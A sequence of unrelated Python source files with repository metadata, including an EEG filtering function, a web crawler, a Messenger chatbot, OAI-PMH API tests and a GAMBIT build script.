l_freq=signal_bp[0],
h_freq=signal_bp[1],
method="iir",
iir_params=iir_params,
verbose=False,
)
# bandpass filter
raw_noise = raw.copy().filter(
l_freq=noise_bp[0],
h_freq=noise_bp[1],
method="iir",
iir_params=iir_params,
verbose=False,
)
# bandstop filter
raw_noise = raw_noise.filter(
l_freq=noise_bs[1],
h_freq=noise_bs[0],
method="iir",
iir_params=iir_params,
verbose=False,
)
# compute covariance matrices for signal and noise contributions
if raw_signal._data.ndim == 3:
cov_signal = mne.compute_covariance(raw_signal, verbose=False).data
cov_noise = mne.compute_covariance(raw_noise, verbose=False).data
elif raw_signal._data.ndim == 2:
cov_signal = np.cov(raw_signal._data)
cov_noise = np.cov(raw_noise._data)
# compute spatial filters
filters = compute_ged(cov_signal, cov_noise)
# compute spatial patterns
patterns = compute_patterns(cov_signal, filters)
return filters, patterns
| 28.741935 | 79 | 0.654321 | 832 | 6,237 | 4.75601 | 0.259615 | 0.036391 | 0.01769 | 0.024766 | 0.357341 | 0.332575 | 0.284559 | 0.230983 | 0.221127 | 0.203437 | 0 | 0.017384 | 0.243707 | 6,237 | 216 | 80 | 28.875 | 0.821497 | 0.458874 | 0 | 0.171053 | 0 | 0 | 0.025271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065789 | false | 0 | 0.039474 | 0 | 0.171053 | 0.013158 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7753a20884a3492ea6c203f075fc2f278a5bdeed | 378 | py | Python | appendix/webcrawler.using.python/bjfu1.py | royqh1979/programming_with_python | 7e1e8f88381151b803b6ae6ebda9809d9cc6664a | [
"MIT"
] | 5 | 2019-03-06T12:28:47.000Z | 2022-01-06T14:06:02.000Z | appendix/webcrawler.using.python/bjfu1.py | royqh1979/programming_with_python | 7e1e8f88381151b803b6ae6ebda9809d9cc6664a | [
"MIT"
] | 6 | 2021-02-02T22:40:49.000Z | 2022-03-12T00:27:54.000Z | appendix/webcrawler.using.python/bjfu1.py | royqh1979/programming_with_python | 7e1e8f88381151b803b6ae6ebda9809d9cc6664a | [
"MIT"
] | 4 | 2019-03-06T14:29:25.000Z | 2020-06-02T15:16:40.000Z | from requests_html import HTMLSession, HTMLResponse
from urllib import parse
session = HTMLSession()
r : HTMLResponse = session.get("http://www.bjfu.edu.cn")
page = r.html
for link in page.links:
print(link)
links = page.find("a")
for link in links:
full_url = parse.urljoin(r.url,link.attrs['href'])
title = link.attrs.get('title','')
print(full_url, title) | 23.625 | 56 | 0.701058 | 57 | 378 | 4.596491 | 0.526316 | 0.053435 | 0.068702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156085 | 378 | 16 | 57 | 23.625 | 0.821317 | 0 | 0 | 0 | 0 | 0 | 0.084433 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7753daae2df4a2fae00adfc29f48ff1084199a78 | 4,015 | py | Python | main/helpers/strformat.py | IanVermes/recompose | e675af59930ae2d45ec054dfa0d0ebc85383c669 | [
"MIT"
] | null | null | null | main/helpers/strformat.py | IanVermes/recompose | e675af59930ae2d45ec054dfa0d0ebc85383c669 | [
"MIT"
] | null | null | null | main/helpers/strformat.py | IanVermes/recompose | e675af59930ae2d45ec054dfa0d0ebc85383c669 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf8 -*-
"""Various string formatting tools for Recompose
Funcs:
makeItalic
Copyright: Ian Vermes 2019
"""
import unicodedata
def makeItalic(string):
"""Convert a string into an italic equivalent.
Accented letters are escaped to the Unicode empty box character. Whitespace
are converted to visible charaters. Punctuation are kept the same.
"""
fill = FILL_CHR # Empty box.
new_string = []
for char in string:
try:
new_char = ITALIC_LETTER_MAP[char]
except KeyError:
if char in WHITESPACE_CHR_MAP:
new_char = WHITESPACE_CHR_MAP[char]
elif unicodedata.category(char) in PUNCTUATION_CAT_SET:
new_char = char
else:
new_char = fill
new_string.append(new_char)
new_string = "".join(new_string)
return new_string
def _get_font_letters(ord_CAP_A):
mapping = {}
for ord in range(ord_CAP_A, ord_CAP_A + 52):
new_char = chr(ord)
if not new_char.isprintable():
msg = "Could not map '{}' to font equivalent."
raise RuntimeError(msg)
_, value = unicodedata.decomposition(new_char).split(" ")
primitive_ord = int(value, base=16)
mapping[chr(primitive_ord)] = new_char
return mapping
def _get_font_digits(ord_ZERO):
mapping = {}
for ord in range(ord_ZERO, ord_ZERO + 10):
new_char = chr(ord)
if not new_char.isprintable():
msg = "Could not map '{}' to font equivalent."
raise RuntimeError(msg)
_, value = unicodedata.decomposition(new_char).split(" ")
primitive_ord = int(value, base=16)
mapping[chr(primitive_ord)] = new_char
return mapping
def _fallback_letter_mapping():
fallback_A = ord("A")
fallback_a = ord("a")
ascii_chars = [chr(i) for i in range(fallback_A, fallback_A + 26)]
ascii_chars += [chr(i) for i in range(fallback_a, fallback_a + 26)]
return {char: char for char in ascii_chars}
def _fallback_digit_mapping():
fallback_ZERO = ord("0")
ascii_chars = [chr(i) for i in range(fallback_ZERO, fallback_ZERO + 10)]
return {char: char for char in ascii_chars}
def _get_best_italic_mapping():
# Get the letter mapping:
for font, ord_A in _FONT_A_POINTS:
try:
mapping = _get_font_letters(ord_CAP_A=ord_A)
except RuntimeError:
mapping = {}
letter_font = None
if mapping:
letter_font = font
break
# Match a numerical font with the letter font
if letter_font is not None:
for font, ord_ZERO in _FONT_ZERO_POINTS.items():
if font in letter_font:
num_map = {}
else:
try:
num_map = _get_font_digits(ord_ZERO)
except RuntimeError:
num_map = {}
if num_map:
break
else:
num_map = {}
# Fallback if things went wrong
if not mapping:
mapping = _fallback_letter_mapping()
if not num_map:
num_map = _fallback_digit_mapping()
# Add num_map options to main mapping:
for char_orig, char_font in num_map.items():
mapping[char_orig] = char_font
return mapping
# Order as desired.
_FONT_A_POINTS = [(2, "MATHEMATICAL BOLD ITALIC", 119912),
(0, "MATHEMATICAL SANS-SERIF BOLD ITALIC", 120380),
(3, "MATHEMATICAL ITALIC", 119860),
(1, "MATHEMATICAL SANS-SERIF ITALIC", 120328)]
_FONT_A_POINTS = [(font, ord_A) for i, font, ord_A in sorted(_FONT_A_POINTS)]
_FONT_ZERO_POINTS = {"MATHEMATICAL BOLD": 120782,
"MATHEMATICAL SANS-SERIF BOLD": 120812}
FILL_CHR = chr(9633) # Empty Box
ITALIC_LETTER_MAP = _get_best_italic_mapping()
WHITESPACE_CHR_MAP = {" ": chr(183), "\n": chr(182), "\t": chr(8677)}
PUNCTUATION_CAT_SET = set("Pc Pd Pe Pf Pi Po Ps Sk".split())
| 30.884615 | 79 | 0.615442 | 524 | 4,015 | 4.45229 | 0.269084 | 0.039006 | 0.012002 | 0.018003 | 0.308187 | 0.291042 | 0.253322 | 0.253322 | 0.253322 | 0.208315 | 0 | 0.026381 | 0.291905 | 4,015 | 129 | 80 | 31.124031 | 0.794231 | 0.124782 | 0 | 0.388889 | 0 | 0 | 0.075266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.011111 | 0 | 0.144444 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7756408f9dee762532b11db43ec36c8b48b1a6a7 | 6,447 | py | Python | main.py | ratanawang/Dentaku | 67f39a2d297b0bbd6b468ea6f2dd7a65683a0f5a | [
"MIT"
] | null | null | null | main.py | ratanawang/Dentaku | 67f39a2d297b0bbd6b468ea6f2dd7a65683a0f5a | [
"MIT"
] | null | null | null | main.py | ratanawang/Dentaku | 67f39a2d297b0bbd6b468ea6f2dd7a65683a0f5a | [
"MIT"
] | null | null | null | import json
import sys
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
from fbchat import log, Client
import os
from fbchat import Message
from fbchat.models import *
import traceback
from datetime import datetime
import time
from fbchat import ThreadType
from fbchat import TypingStatus
import importlib
database = {}
# Subclass fbchat.Client and override required methods
class dentaku_bot(Client):
def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):
global database
if database['testing'].lower() == "y" and thread_type != ThreadType.USER:
return
if "!" in str(message_object.text)[0] and len(message_object.text) > 1:
client.setTypingStatus(
TypingStatus.TYPING, thread_id=thread_id, thread_type=thread_type
)
message = str(message_object.text).replace("!", "").split(" ")
print(message)
if message == ['']:
return
command_index = 1
if message[0] == '':
for each in message:
if each != '':
command = each
break
command_index += 1
else:
command = message[0]
try:
parameters = {
"user": message[command_index:],
"author_id": author_id,
"message_object": message_object,
"thread_id": thread_id,
"thread_type": thread_type,
"database": database,
"gdb": gdb
}
command = command.lower()
module = importlib.import_module(".." + command, "commands.subpkg")
new_command = getattr(module, command)
instance = new_command(parameters, client=self)
instance.process()
except ModuleNotFoundError:
print(traceback.format_exc())
self.send(
Message(text="Command not found."),
thread_id=thread_id,
thread_type=thread_type,
)
except Exception as e:
self.send(
Message(text="Error: " + traceback.format_exc()),
thread_id=thread_id,
thread_type=thread_type,
)
else:
for word in keywords.keys():
if word.lower() in message_object.text.lower():
try:
parameters = {
"author_id": author_id,
"message_object": message_object,
"thread_id": thread_id,
"thread_type": thread_type,
"database": database,
"gdb": gdb
}
module = importlib.import_module(".." + keywords[word], "keywords.subpkg")
new_command = getattr(module, keywords[word])
instance = new_command(parameters, client=self)
instance.run()
except ModuleNotFoundError:
self.send(
Message(text="Keyword did not map to an existing python module."),
thread_id=thread_id,
thread_type=thread_type,
)
except Exception as e:
self.send(
Message(text="Error: " + traceback.format_exc()),
thread_id=thread_id,
thread_type=thread_type,
)
def export_env():
with open("export.sh", "r") as file_in:
for line in file_in:
if "\"" in line:
os.environ[line.split("=")[0].split(" ")[1]] = line[line.find("\"") + 1:line.rfind("\"")]
else:
line = line.replace("export", "").replace(" ", "")
line = line.split("=")
os.environ[line[0]] = line[1]
export_env()
client = dentaku_bot(os.getenv('EMAIL'), os.getenv('PASSWORD'))
if os.path.exists("database.json"):
with open("database.json", 'r') as file:
try:
database = json.load(file)
except json.decoder.JSONDecodeError:
print("JSON file is invalid. Repair or delete database.json.")
sys.exit()
if 'deployment' in database:
database['deployment'] += 1
else:
database['deployment'] = 0
database['last_deployment_time'] = time.time()
with open('database.json', 'w') as file:
json.dump(database, file)
else:
database = {"deployment": 0, "subscription": []}
with open('database.json', 'w') as file:
json.dump(database, file)
if os.path.exists("keywords.json"):
with open("keywords.json", 'r') as file:
try:
keywords = json.load(file)
except json.decoder.JSONDecodeError:
print("JSON file is invalid. Repair or delete keywords.json.")
else:
keywords = {}
with open('keywords.json', 'w') as file:
json.dump(keywords, file)
if 'testing' not in database:
print("Testing mode will restrict all bot interactions to direct messages, or ThreadType.USER.")
database['testing'] = input("Turn on testing mode? (y/n): ")
if input("Save this decision? (y/n): ").lower() == 'y':
with open('database.json', 'w') as file:
json.dump(database, file)
print("Decision saved to database.json with the key 'testing'")
else:
print("Testing mode is currently " + ("on" if database['testing'].lower() == 'y' else 'off'))
print("Mode is saved in database.json")
for thread in database['subscription']:
client.send(Message(
text="[" + datetime.now().strftime("%Y-%m-%d %-I:%M %p") + "] Dentaku deployed just now. #" + str(
database['deployment'])),
thread_id=thread, thread_type=ThreadType.USER)
if 'G_CREDENTIALS' in os.environ:
cred = credentials.Certificate(os.environ['G_CREDENTIALS'])
firebase_admin.initialize_app(cred)
gdb = firestore.client()
else:
gdb = None
client.listen()
| 37.701754 | 106 | 0.52443 | 655 | 6,447 | 5.048855 | 0.241221 | 0.051406 | 0.067735 | 0.043544 | 0.323858 | 0.275779 | 0.270033 | 0.242213 | 0.231327 | 0.231327 | 0 | 0.00341 | 0.363115 | 6,447 | 170 | 107 | 37.923529 | 0.801997 | 0.008066 | 0 | 0.36129 | 0 | 0 | 0.149539 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012903 | false | 0.006452 | 0.109677 | 0 | 0.141935 | 0.051613 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
775a861eece660969f39947eb4baee777235fec5 | 1,859 | py | Python | tests/adaptors/lsf/test_lsf_adaptor.py | Abdullah-Ghani/radical.saga | bb9d9bd97905627b9bf45a85c6d1d6a60ca9fb39 | [
"MIT"
] | null | null | null | tests/adaptors/lsf/test_lsf_adaptor.py | Abdullah-Ghani/radical.saga | bb9d9bd97905627b9bf45a85c6d1d6a60ca9fb39 | [
"MIT"
] | null | null | null | tests/adaptors/lsf/test_lsf_adaptor.py | Abdullah-Ghani/radical.saga | bb9d9bd97905627b9bf45a85c6d1d6a60ca9fb39 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
__author__ = 'Ioannis Paraskevakos'
__copyright__ = 'Copyright 2018-2019, The SAGA Project'
__license__ = 'MIT'
'''
This test tests the LSF script generator function as well as the LSF adaptor
'''
import unittest
import radical.saga.url as surl
import radical.saga as rs
from radical.saga.adaptors.lsf.lsfjob import _lsfscript_generator
# ------------------------------------------------------------------------------
#
def test_lsfscript_generator():
smt = 4
url = surl.Url('gsissh://summit.ccs.ornl.gov')
jd = rs.job.Description()
jd.name = 'Test'
jd.executable = '/bin/sleep'
jd.arguments = 60
jd.environment = {'test_env': 15}
jd.output = 'output.log'
jd.error = 'error.log'
jd.queue = 'normal-queue'
jd.project = 'TestProject'
jd.wall_time_limit = 70
jd.total_cpu_count = 65 * smt
tgt_script = '\n#!/bin/bash \n' \
+ '#BSUB -q normal-queue \n' \
+ '#BSUB -J Test \n' \
+ '#BSUB -W 1:10 \n' \
+ '#BSUB -o output.log \n' \
+ '#BSUB -e error.log \n' \
+ '#BSUB -P TestProject \n' \
+ '#BSUB -nnodes 2 \n' \
+ "#BSUB -alloc_flags 'gpumps smt4' \n" \
+ '\n' \
+ 'export RADICAL_SAGA_SMT=%d test_env=15\n' % smt \
+ '/bin/sleep 60'
script = _lsfscript_generator(url=url, logger=None, jd=jd,
ppn=None, lsf_version=None, queue=None)
assert (script == tgt_script)
# ------------------------------------------------------------------------------
#
if __name__ == '__main__':
test_lsfscript_generator()
# ------------------------------------------------------------------------------
| 27.746269 | 80 | 0.467994 | 195 | 1,859 | 4.25641 | 0.482051 | 0.048193 | 0.040964 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019727 | 0.291017 | 1,859 | 66 | 81 | 28.166667 | 0.610015 | 0.138246 | 0 | 0 | 0 | 0 | 0.268696 | 0.018531 | 0 | 0 | 0 | 0 | 0.026316 | 1 | 0.026316 | false | 0 | 0.105263 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
775ac367626f1aa9586832636fbfee895d196274 | 1,159 | py | Python | setup.py | froddd/govuk_template_django | e0792013c260b4c9b66486fc779be372e1e45377 | [
"MIT"
] | null | null | null | setup.py | froddd/govuk_template_django | e0792013c260b4c9b66486fc779be372e1e45377 | [
"MIT"
] | null | null | null | setup.py | froddd/govuk_template_django | e0792013c260b4c9b66486fc779be372e1e45377 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
sdict = dict(
name = 'django-govuk-template',
packages = find_packages(),
version = '0.16.0',
description = 'Django packaged version of the GOV.UK template',
long_description = 'A base template for Government Digital Services',
url = 'https://github.com/alphagov/govuk_template',
author = 'Government Digital Service developers (https://gds.blog.gov.uk/)',
author_email = 'fred.marecesche@digital.justice.gov.uk',
maintainer = 'Fred Marecesche',
maintainer_email = 'fred.marecesche@digital.justice.gov.uk',
keywords = ['python', 'django', 'alphagov', 'govuk'],
license = 'MIT',
include_package_data = True,
install_requires = [
'django>=1.3'
],
platforms=["any"],
classifiers=[
'Programming Language :: Python',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
from distutils.core import setup
setup(**sdict)
| 31.324324 | 78 | 0.689387 | 133 | 1,159 | 5.93985 | 0.616541 | 0.025316 | 0.048101 | 0.065823 | 0.096203 | 0.096203 | 0.096203 | 0 | 0 | 0 | 0 | 0.007261 | 0.168248 | 1,159 | 36 | 79 | 32.194444 | 0.812241 | 0.017256 | 0 | 0 | 0 | 0 | 0.538664 | 0.085237 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.09375 | 0 | 0.09375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
775ebac144774000350d5090b530d9ac825e6807 | 8,710 | py | Python | tests/resources/test_resources_oai.py | inveniosoftware/invenio-datacite | d25e3670b74f132390fc42e5647765ae5c605ef3 | [
"MIT"
] | null | null | null | tests/resources/test_resources_oai.py | inveniosoftware/invenio-datacite | d25e3670b74f132390fc42e5647765ae5c605ef3 | [
"MIT"
] | null | null | null | tests/resources/test_resources_oai.py | inveniosoftware/invenio-datacite | d25e3670b74f132390fc42e5647765ae5c605ef3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2022 Graz Univeresity of Technology.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""OAI-PMH resource level tests."""
import pytest
from flask import current_app
from invenio_oaiserver.errors import OAISetSpecUpdateError
def _create_set(client, data, headers, status_code):
"""Send POST request."""
s = client.post(
'/oaipmh/sets',
headers=headers,
json=data,
)
assert s.status_code == status_code
return s
def _get_set(client, id, headers, status_code):
"""Send GET request."""
s = client.get(
f'/oaipmh/sets/{id}',
headers=headers,
)
assert s.status_code == status_code
return s
def _update_set(client, id, data, headers, status_code):
"""Send PUT request."""
s = client.put(
f'/oaipmh/sets/{id}',
headers=headers,
json=data,
)
assert s.status_code == status_code
return s
def _delete_set(client, id, headers, status_code):
"""Send DELETE request."""
s = client.delete(
f'/oaipmh/sets/{id}',
headers=headers,
)
assert s.status_code == status_code
return s
def _search_sets(client, query, headers, status_code):
s = client.get(
'/oaipmh/sets',
headers=headers,
query_string=query,
)
assert s.status_code == status_code
return s
def _search_formats(client, headers, status_code):
s = client.get(
'/oaipmh/formats',
headers=headers,
)
assert s.status_code == status_code
return s
def test_create_set(client, admin, minimal_oai_set, headers):
"""Create a set."""
client = admin.login(client)
# without description
s1 = _create_set(client, minimal_oai_set, headers, 201).json
assert s1["name"] == minimal_oai_set["name"]
assert s1["spec"] == minimal_oai_set["spec"]
assert s1["description"] == minimal_oai_set["description"]
assert s1["search_pattern"] == minimal_oai_set["search_pattern"]
# with description
minimal_oai_set["spec"] = "s2"
minimal_oai_set["description"] = "description"
s2 = _create_set(client, minimal_oai_set, headers, 201).json
assert s2["name"] == minimal_oai_set["name"]
assert s2["spec"] == minimal_oai_set["spec"]
assert s2["description"] == minimal_oai_set["description"]
assert s2["search_pattern"] == minimal_oai_set["search_pattern"]
valid = ["-", "_", ".", "!", "~", "*", "'", "(", ")"]
for vs in valid:
s = minimal_oai_set.copy()
s["spec"] = vs
cs = _create_set(client, s, headers, 201).json
assert s["spec"] == cs["spec"]
def test_create_set_duplicate(client, admin, minimal_oai_set, headers):
"""Create two sets with same spec."""
client = admin.login(client)
_create_set(client, minimal_oai_set, headers, 201)
_create_set(client, minimal_oai_set, headers, 400)
def test_create_set_invalid_data(client, admin, minimal_oai_set, headers):
"""Try to create a set with invalid params."""
client = admin.login(client)
key = "name"
s = minimal_oai_set.copy()
s[key] *= 256
_create_set(client, s, headers, 400)
del s[key]
_create_set(client, s, headers, 400)
key = "spec"
s = minimal_oai_set.copy()
s[key] *= 256
_create_set(client, s, headers, 400)
del s[key]
_create_set(client, s, headers, 400)
invalid = [";", "/", "?", ":", "@", "&", "=", "+", "$", ",", "community-"]
for ivs in invalid:
s = minimal_oai_set.copy()
s["spec"] = ivs
_create_set(client, s, headers, 400).json
key = "search_pattern"
s = minimal_oai_set.copy()
del s[key]
_create_set(client, s, headers, 400)
def test_get_set(client, admin, minimal_oai_set, headers):
"""Retrieve a set."""
client = admin.login(client)
# without description
created_set = _create_set(client, minimal_oai_set, headers, 201).json
retrieved_set = _get_set(client, created_set["id"], headers, 200).json
assert created_set["id"] == retrieved_set["id"]
assert created_set["name"] == retrieved_set["name"]
assert created_set["spec"] == retrieved_set["spec"]
assert created_set["description"] == retrieved_set["description"]
assert created_set["search_pattern"] == retrieved_set["search_pattern"]
# with description
minimal_oai_set["spec"] = "s2"
minimal_oai_set["description"] = "description"
created_set = _create_set(client, minimal_oai_set, headers, 201).json
retrieved_set = _get_set(client, created_set["id"], headers, 200).json
assert created_set["id"] == retrieved_set["id"]
assert created_set["name"] == retrieved_set["name"]
assert created_set["spec"] == retrieved_set["spec"]
assert created_set["description"] == retrieved_set["description"]
def test_get_set_not_existing(client, admin, headers):
"""Retrieve not existing set."""
client = admin.login(client)
_get_set(client, 9001, headers, 404).json
def test_update_set(client, admin, minimal_oai_set, headers):
"""Update a set."""
client = admin.login(client)
s1 = _create_set(client, minimal_oai_set, headers, 201).json
update = minimal_oai_set.copy()
update["name"] = "updated"
update["description"] = "updated"
update["search_pattern"] = "updated"
s1_updated = _update_set(client, s1["id"], update, headers, 200).json
assert s1_updated["name"] == update["name"]
assert s1_updated["description"] == update["description"]
assert s1_updated["search_pattern"] == update["search_pattern"]
assert s1_updated["id"] == s1["id"]
assert s1_updated["spec"] == s1["spec"]
def test_update_set_invalid_data(client, admin, minimal_oai_set, headers):
"""Update a set with invalid data.
Most cases are already handled in test_create_set_invalid_data
"""
client = admin.login(client)
s1 = _create_set(client, minimal_oai_set, headers, 201).json
s = minimal_oai_set.copy()
# changing spec is not allowed
s["spec"] = "should raise an error"
with pytest.raises(OAISetSpecUpdateError):
_update_set(client, s1["id"], s, headers, 400)
# trying to set data which is read_only
s = s1.copy()
s["id"] = 200
_update_set(client, s1["id"], s, headers, 400)
s = s1.copy()
s["created"] = 200
_update_set(client, s1["id"], s, headers, 400)
s = s1.copy()
s["updated"] = 200
_update_set(client, s1["id"], s, headers, 400)
def test_delete_set(client, admin, minimal_oai_set, headers):
"""Retrieve a set."""
client = admin.login(client)
s1 = _create_set(client, minimal_oai_set, headers, 201).json
_delete_set(client, s1["id"], headers, 204)
_get_set(client, s1["id"], headers, 404)
def test_delete_set_not_existing(client, admin, headers):
"""Delete not existing set."""
client = admin.login(client)
_delete_set(client, 9001, headers, 404).json
def test_search_sets(client, admin, minimal_oai_set, headers):
"""Search sets."""
client = admin.login(client)
created_sets = []
num_sets = 4
for i in range(num_sets):
minimal_oai_set["spec"] = minimal_oai_set["name"] = f"set_{i}"
s1 = _create_set(client, minimal_oai_set, headers, 201).json
created_sets.append(s1)
search = _search_sets(client, {}, headers, 200).json
assert search["hits"]["total"] == num_sets
for i in range(num_sets):
assert search["hits"]["hits"][i]["spec"] == created_sets[i]["spec"]
assert "next" not in search["links"]
assert "prev" not in search["links"]
search = _search_sets(
client, {"size": "1", "page": "2"}, headers, 200
).json
assert "next" in search["links"]
assert "prev" in search["links"]
search = _search_sets(
client, {"sort_direction": "desc"}, headers, 200
).json
for i in range(num_sets):
assert (
search["hits"]["hits"][num_sets - 1 - i]["spec"]
== created_sets[i]["spec"]
)
def test_search_metadata_formats(client, admin, headers):
"""Retrieve metadata formats."""
client = admin.login(client)
available_formats = current_app.config.get(
"OAISERVER_METADATA_FORMATS", {}
)
search = _search_formats(client, headers, 200).json
assert search["hits"]["total"] == len(available_formats)
for hit in search["hits"]["hits"]:
assert hit["id"] in available_formats
assert hit["schema"] == available_formats[hit["id"]]["schema"]
assert hit["namespace"] == available_formats[hit["id"]]["namespace"]
| 30.886525 | 78 | 0.645695 | 1,148 | 8,710 | 4.66115 | 0.135889 | 0.070641 | 0.094749 | 0.067277 | 0.642123 | 0.599514 | 0.527752 | 0.428892 | 0.378621 | 0.340684 | 0 | 0.023596 | 0.206889 | 8,710 | 281 | 79 | 30.996441 | 0.751013 | 0.090815 | 0 | 0.473684 | 0 | 0 | 0.106805 | 0.003326 | 0.005263 | 0 | 0 | 0 | 0.210526 | 1 | 0.089474 | false | 0 | 0.015789 | 0 | 0.136842 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f0b75a340684f3a708d7b4bcb4bfaae6b7e99d | 8,397 | py | Python | cmake/scripts/update_cmakelists.py | patscott/gambit_1.4 | a50537419918089effc207e8b206489a5cfd2258 | [
"Unlicense"
] | 1 | 2019-01-21T19:59:18.000Z | 2019-01-21T19:59:18.000Z | cmake/scripts/update_cmakelists.py | patscott/gambit_1.2 | 19d8ffbe58e1622542eef6c48790fb1a8cf6dd0b | [
"Unlicense"
] | 4 | 2019-10-06T14:03:41.000Z | 2020-08-06T11:53:54.000Z | cmake/scripts/update_cmakelists.py | patscott/gambit_1.4 | a50537419918089effc207e8b206489a5cfd2258 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
#
# GAMBIT: Global and Modular BSM Inference Tool
#*********************************************
# \file
#
# Script to create the CMakeLists.txt files
# for GAMBIT modules.
#
#*********************************************
#
# Authors (add name and date if you modify):
#
# \author Pat Scott
# (patscott@physics.mcgill.ca)
# \date 2014 Nov
#
# \author Ben Farmer
# (b.farmer@imperial.ac.uk)
# \date 2018 Oct
#
#*********************************************
import os
toolsfile="./Utils/scripts/harvesting_tools.py"
exec(compile(open(toolsfile, "rb").read(), toolsfile, 'exec')) # Python 2/3 compatible version of 'execfile'
# Search the source tree to determine which modules are present
def module_census(verbose,install_dir,excludes):
modules=[]
for root,dirs,files in os.walk(install_dir):
for mod in dirs:
exclude = False
for x in excludes:
if mod.startswith(x): exclude = True
if not exclude and mod.lower().find("bit") != -1 and mod.lower().find(".dsym") == -1:
if verbose: print("Located GAMBIT module '{0}'.".format(mod))
modules+=[mod]
break
return modules
def hidden(filename):
return (filename.endswith("~") or filename.startswith("."))
# Actual updater program
def main(argv):
# Lists of modules to exclude; anything starting with one of these strings is excluded.
exclude_modules=set(["ScannerBit"])
# List of printers to exclude; subdirectories within the Printers directory
# that match these strings will be ignored.
exclude_printers=set([]) # -Ditch'ed printers
# List of models to exclude; files within the Models/models directories
# that match these strings will be ignored.
exclude_models=set([]) # -Ditch'ed models
# List of backends to exclude; subdirectories within the Backends/frontends directories
# that match these strings will be ignored.
exclude_backends=set([]) # -Ditch'ed backends
# Handle command line options
verbose = False
try:
opts, args = getopt.getopt(argv,"vx:",["verbose","exclude-modules="])
except getopt.GetoptError:
print('Usage: update_cmakelists.py [flags]')
print(' flags:')
print(' -v : More verbose output')
print(' -x module1,backendA,printer2,modelX,... : Exclude module1, backendA, printer2, modelX, etc.')
sys.exit(2)
for opt, arg in opts:
if opt in ('-v','--verbose'):
verbose = True
print('update_cmakelists.py: verbose=True')
elif opt in ('-x','--exclude','--exclude'):
exclude_modules.update(neatsplit(",",arg))
exclude_printers.update(neatsplit(",",arg))
exclude_models.update(neatsplit(",",arg))
exclude_backends.update(neatsplit(",",arg))
# Find all the modules.
modules = module_census(verbose,".",exclude_modules)
# Add the Backends, Models and Printers dirs only if present
for x in ["Backends", "Models", "Printers"]:
if os.path.isdir(x): modules += [x]
# Loop over the found modules.
for mod in modules:
# Clear the excluded components
excluded_components = set([])
# Retrieve the list of module source files.
srcs = []
for root,dirs,files in os.walk("./"+mod+"/src"):
current_dirname = os.path.basename(os.path.normpath(root))
if mod=="Printers" and excluded(current_dirname, exclude_printers):
if verbose: print(" Ignoring source files for printer {0}".format(current_dirname))
continue # skip this directory
for name in files:
if (name.endswith(".c") or name.endswith(".cc") or name.endswith(".cpp")) and not hidden(name):
short_root = re.sub("\\./"+mod+"/src/?","",root)
if short_root != "" : short_root += "/"
if mod in ["Backends", "Models"] and "/backend_types/" not in short_root and excluded(name, exclude_backends | exclude_models):
if verbose: print(" Ignoring {0} source file '{1}'".format(mod,short_root+name))
excluded_components.add(os.path.splitext(name)[0])
continue # skip this file
